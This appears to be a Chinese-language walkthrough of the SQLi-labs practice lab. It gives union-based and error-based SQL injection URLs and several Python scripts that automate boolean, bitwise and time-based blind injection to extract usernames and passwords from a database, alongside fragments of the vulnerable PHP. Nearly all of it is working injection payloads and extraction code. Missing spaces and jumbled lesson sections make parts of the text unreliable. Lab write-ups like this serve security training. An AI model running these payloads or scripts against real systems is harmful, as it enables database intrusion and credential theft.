http://192.168.3.7/sqli/Less-1/?id=1' order by 4 --+
判断显示位。可以得到显示位为2,3
1
http://192.168.3.7/sqli/Less-1/?id=-1' union select1,2,3--+
得到数据库名security
1
http://192.168.3.7/sqli/Less-1/?id=-1' union select1,database(),3--+
得到表名emails,referers,uagents,users
1
http://192.168.3.7/sqli/Less-1/?id=-1' union select1,(selectgroup_concat(table_name) from information_schema.tables where table_schema=database()),3--+
得到列名id,username,password
1
http://192.168.3.7/sqli/Less-1/?id=-1' union select1,(selectgroup_concat(column_name) from information_schema.columns where table_name='users'),3--+
得到数据
1
http://192.168.3.7/sqli/Less-1/?id=-1' union select1,(selectgroup_concat(username,0x23,password) fromusers),3--+
Less-2
整形注入
1 2 3 4 5
<?php $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); ?>
answer:
1
http://192.168.3.7/sqli/Less-2/?id=1 --+
Less-3
单引号和括号注入
1 2 3 4 5
<?php $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); ?>
defbinary(): url="http://192.168.3.7/sqli/Less-5/?id=1" #payload="1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))<{} --+" #payload = "1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit {},1),{},1))<{} --+" payload="1' and ascii(substr((select password from users limit {},1),{},1))<{} --+" for i in range(8): info="" for j in range(1,40): left=0x20 right=0x7f while1: mid=left+(right-left)//2 if mid==left: #print(mid) info=info+chr(mid) print(info) break tmppayload=payload.format(i,j,mid) tmpurl=url+tmppayload res=requests.get(tmpurl) if'You are in'in res.text: right=mid else: left=mid
} } else { echo"Please input the ID as parameter with numeric value";}
?>
answer:
得到数据库名
1
http://192.168.3.7/sqli/Less-6/?id=1" union selectcount(*),2,concat(':',(selectdatabase()),':',floor(rand()*2))as a from information_schema.tables groupby a --+
得到表名
1
http://192.168.3.7/sqli/Less-6/?id=1" union selectcount(*),2,concat(':',(selectgroup_concat(table_name) from information_schema.tables where table_schema=database()),':',floor(rand()*2))as a from information_schema.tables groupby a --+
得到列名
1
http://192.168.3.7/sqli/Less-6/?id=1" union selectcount(*),2,concat(':',(selectgroup_concat(column_name) from information_schema.columns where table_name='users'),':',floor(rand()*2))as a from information_schema.tables groupby a --+
得到数据
1
http://192.168.3.7/sqli/Less-6/?id=1" union selectcount(*),2,concat(':',(selectconcat(username,0x23,password) fromuserslimit0,1),':',floor(rand()*2))as a from information_schema.tables groupby a --+
<?php $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
if($row) { echo'<font color= "#FFFF00">'; echo'You are in.... Use outfile......'; echo"<br>"; echo"</font>"; } else { echo'<font color= "#FFFF00">'; echo'You have an error in your SQL syntax'; //print_r(mysql_error()); echo"</font>"; } } else { echo"Please input the ID as parameter with numeric value";}
?>
tips 数据库用户权限判断
1 2
and (select count(*) from mysql.user)>0 --+ 如果返回正常,说明具有读写权限。 and (select count(*) from mysql.user)>0 --+ 返回错误,数据库帐户较低。
secure_file_priv 这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。这些操作需要用户这些操作需要用户具有FILE权限。
<?php $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
if($row) { echo'<font size="5" color="#FFFF00">'; echo'You are in...........'; echo"<br>"; echo"</font>"; } else { echo'<font size="5" color="#FFFF00">'; //echo 'You are in...........'; //print_r(mysql_error()); //echo "You have an error in your SQL syntax"; echo"</br></font>"; echo'<font color= "#0000ff" font size= 3>'; } } else { echo"Please input the ID as parameter with numeric value";}
import requests defand_operation(): url="http://192.168.3.7/sqli/Less-8/?id=1" # &运算要注意编码,特别是get请求的时候,会跟参数的分隔符&混淆 #payload = "' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))%26{} --+" #payload = "' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit {},1),{},1))%26{} --+" payload="' and ascii(substr((select concat(username,0x23,password )from users limit {},1),{},1))%26{} -- +" for i in range(8): info="" for j in range(1,40): value=0 for k in range(7): tmppayload=payload.format(i,j,2**k) tmpurl=url+tmppayload res=requests.get(tmpurl) if'You are in'in res.text: value=value+(2**k) if value==0: break info=info+chr(value) print(info)
echo'<font size="5" color="#FFFF00">'; echo'You are in...........'; //print_r(mysql_error()); //echo "You have an error in your SQL syntax"; echo"</br></font>"; echo'<font color= "#0000ff" font size= 3>';
} } else { echo"Please input the ID as parameter with numeric value";}
import requests import time defbinary(): url="http://192.168.3.7/sqli/Less-9/?id=1" #payload="' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))<{} --+" #payload = "' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit {},1),{},1))<{} --+" payload="' and if(ascii(substr((select password from users limit {},1),{},1))<{},sleep(2),1) --+" for i in range(8): info="" flag=0#判断是否数字的末尾 for j in range(1,40): if flag==1: break left=0x20 right=0x7f while1: mid=left+(right-left)//2 if mid==left: #print(mid) if mid==0x20: flag=1 break info=info+chr(mid) print(info) break tmppayload=payload.format(i,j,mid) tmpurl=url+tmppayload startTime=time.time() res=requests.get(tmpurl) endTime=time.time() spendTime=endTime-startTime if spendTime>=2: right=mid else: left=mid
import requests import time defbinary(): url="http://192.168.3.7/sqli/Less-15/" payload="admin' and case when (ascii(substr((select concat(table_name) from information_schema.tables where table_schema=database() limit {} ,1),{},1))<{}) then sleep(3) else 1 end -- +" for i in range(10): info = "" for j in range(0,40): flag=0 left=0x1f right=0x7f while1: mid=left+(right-left)//2 if mid==left: if mid==0x1f: flag=1 break info=info+chr(mid) print(info) break data={ 'uname': payload.format(i,j,mid), 'passwd': "ye1s", 'submit': 'Submit' } # print(payload.format(i,j,mid)) startTime=time.time() requests.post(url=url,data=data) endTime=time.time() spendTime=endTime-startTime if spendTime>=3: right=mid else: left=mid
评论